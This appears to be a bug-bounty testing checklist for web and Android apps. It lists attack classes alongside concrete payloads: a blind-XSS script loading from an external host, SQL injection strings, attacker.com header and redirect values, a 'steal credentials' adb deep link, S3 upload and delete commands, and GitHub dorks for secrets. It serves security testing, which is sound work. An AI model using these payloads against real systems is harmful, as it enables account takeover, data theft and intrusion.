• Analyse the app putting xss payloads
• ATO via CSRF attack (changing email)
• ATO oauth third party apps
• CSRF in sensitive functions
• Critical IDORs
• Upload features for malicious files
• Horizontal Privilege escalation in company settings
• Vertical Privilege escalation in company settings
• Account deletion endpoints
• 2FA bypass (direct, rate limit, response manipulation, etc)
• No rate limiting in authentication/sensitive endpoints
• Rate Limiting Bypasses (after getting 429 response)
• Check origin IP address (DNS history records)
• Race condition in functions that allow limited use only
• Account data deletion
• HTML injection in custom email functions
• Dangerous HTTP methods enabled
  X-HTTP-Method-Override: PUT
• Signup feature
• Burp plugin ‘ParamMiner’ to guess parameters/headers
• Check JWT tokens authentication/authorization
• Check Account creation steps
• Test weak password policy (low issue + bruteforce = takeover)
• Captchas bypass
• Subdomains takeover with impact
• S3 bucket takeovers
• Blind XSS in: contact us, ticket support, feedback, chat app
• Ticket Trick vulnerability
• Fuzzing for misconfiguration and sensitive files
• CORS in sensitive endpoints
• Test XXE if the server accepts svg files
• Use WaybackUrls for URLS

X-Host: attacker.com
X-Server: attacker.com
X-Forwarded-For: attacker.com
X-Forwarded-Host: attacker.com

• Parameter Polution – “/email=danielv@gmail.com&email=attacker@gmail.com”
• Test “remember-me” function
• Session Fixation
• Cookie bomb (find any GET request that set cookies “endpoint/?dummy_cookie=reflect_this”)
• Password reset token not expiring
• Long Password/Email DoS attack

• remove CSRF token from request
• Remove CSRF token parameter value
• Change POST to GET and also remove token from get “endpoint/?csrftoken=&dummy=danielvcookies”
• Use CSRF from another account

Change content-type: application/json
to
Content-Type: text/plain or Content-Type: application/x-www-form-urlencoded

• upload unexpected file format to achieve RCE (swf, html, php, php3, aspx)
• Use Burp suite Plugin “Upload Scanner” to check different kinds of file upload
• Blind sql in name file: “pocfilename’+(select*from(select(sleep(20)))a)+’.jpeg”
• Upload “filename.jpg” – and if the name reflects, try XSS
• Always try XXE in .docx, .pdf and .xml uploaded files

Always check the upload response for these file extensions:

• .SVG
• .HTML
• .SWF
• .XML

PHP Extensions:

.php
.php3
.php4
.php5
.php7
.pht
.phar
.phpt
.pgif
.phtml
.phtm

Double extensions

.jpeg.php
.jpg.php
.png.php

Other extensions

asp : .asp, .aspx
perl: .pl, .pm, .cgi, .lib
jsp : .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion: .cfm, .cfml, .cfc, .dbm

Common Injection Points:

• Sql in user agent HEADER user-agent: ‘XOR(if(now()=sysdate(),sleep(5*5),0))OR’
• Parameter ID
• Currency Values
• Item Number Values
• Sorting Parameters (asc, desc)
• Cookies Values
• Custom Headers (possible integration with WAF’s, CDN’s)

"><script src=https://blinddanielv.xss.ht></script>

• User-Agent
• place an order and payload 2nd line address
• contact us page
• feedback page
• chat app
• request something (delete acct, unblock beta feature)
• Signup page (free trial page)

Common Places:

• sign up
• sign in
• login
• password reset forms
• create a ficticious param and try manual redir: host.com/login?redirect=https://attacker.com
• burp intruder with open redirect payload: any.com/parameterparameter

open redir + xss: redirectUrl=https://www.google.com/”;alert(0);//

Common Functions:

• Non-public Images
• Receipts
• Private Files (pdfs, ++)
• Shipping Info & Purchase Orders
• Sending/Deleting messages

Common Params:

id=
user=
account=
number=
order=
no=
doc=
key=
email=
group=
profile=
edit=

tip: check SQL injection on IDOR’s

Clone all the COMPANY or USER repositories:

curl -s "https://api.github.com/users/COMPANYorUSER/repos?per_page=100" | jq -r ".[].git_url" | xargs -L1 git clone

then use GitLeaks tool:

gitleaks -p all-company-and-user-gits\ -o gitleak-results -v

MANUAL GIT OSINT:

Some useful Github dorks

"target" password
"target" access_token
"target" client_secret
"target" account_sid
"target" private_token
"target" secret
"target" credentials
"target" token
"target" config
"target" key
"target" pass
"target" login
"target" ftp
"target" pwd
“company.com” “dev”
“company.com” API_key
“company.com” password
"target" db_host
"target" db_name
"target" db_user
"target" db_password

Dork filter by language:
"company" language:python password

List open buckets:

aws s3 ls s3://bucket.name

Download entire bucket files:

aws s3 sync s3://bucket-name .

Upload file to bucket:

aws s3 cp malicious.txt s3://bucket-name/malicious.txt

Remove file from bucket:

aws s3 rm s3://bucket-name/malicious.txt

• folders /assets and /res /raw
• GREP for sensitive keys using this pattern grep -r 'AIza[0-9A-Za-z\\-_]{35}' .
• search sensitive .txt files
• Inspect Manifest.xml file
• /res/values/strings.xml API keys
• @xml/network_security_config.xml analysis
• Test deep links in Manifest.xml
• verify firebase access to /.json, /Users.json, /Logs.json
• Check Activities/Services/Intents with adb tool
• Grep sensitive Keywords in decompiled jar files and apk’s folder
• Sensitive information disclosed in application error messege
• Binary reverse engineering
• Collect URLs and Endpoints from apk
• Sensitive information disclosed in storage of the mobile device
• Sensitive information found in logs
• Sensitive information found in cache
• Sensitive information found in installed application folder
• Sensitive information stored in shared preference files

• Client/Server Side attacks
  • Check for SQL injection
  • XML injection
  • XSS injection
• App level DOS (long inputs, json dos)
• Broken Authentication & Authorization
  • Session behavior after pass reset
  • Expired Token can be reused
  • Oauth Flow
  • 2FA bypass
  • Cleartext Transmission
  • Auth bypass using response manipulation
• Broken Access Control
  • SSRFs
  • Privilege escalations
  • IDORs
  • Unauthorized/Sensitive API calls
• CAPTCHA implementation flaws & bypass
• Check for all HTTP methods (PUT, DELETE etc. Use burp intruder using HTTP verb tampering)
• Other user’s sensitive details enumeration
• Malicious file upload
• Server side flaws (IIS, APACHE, TOMCAT etc.)

Keywords:

ADB command to trigger Schemes:

am start -W -a android.intent.action.VIEW -d "custom://intent"

Open redirection + steal credentials

adb shell am start -a android.intent.action.VIEW custom://deeplink?parameter=https://attacker.com.br --ez authentication_header true

Adb to trigger components:

Activity:

adb shell am start -n "com.peirr.test/com.peirr.test.MyActivity" --es name "John" --ei age 30

Broadcast Receiver:

adb shell am broadcast -n "com.peirr.test/com.peirr.test.MyReceiver" --es name "John" --ei age 30

Services:

adb shell am startservice -n "com.peirr.test/com.peirr.test.MyService" --es name "John" --ei age 30

XSS with available parameters:

adb shell am start -n com.company.apk/com.company.mseg.activity.CommonActivity -e url "javascript:alert(1)"

Schemas allowed in Activity:

To reproduce local file access use:

adb shell am start -n com.company.apk/com.company.android.CommonActivity -d "file:///storage/emulated/0/Download/document-blank.pdf"

To reproduce javascript injection:

adb shell am start -n com.company.apk/com.company.android.CommonActivity -d "javascript://example.com%0A alert(1);"

To reproduce open redirect:

adb shell am start -n com.company.apk/com.company.android.CommonActivity -d "http://attacker.com.br"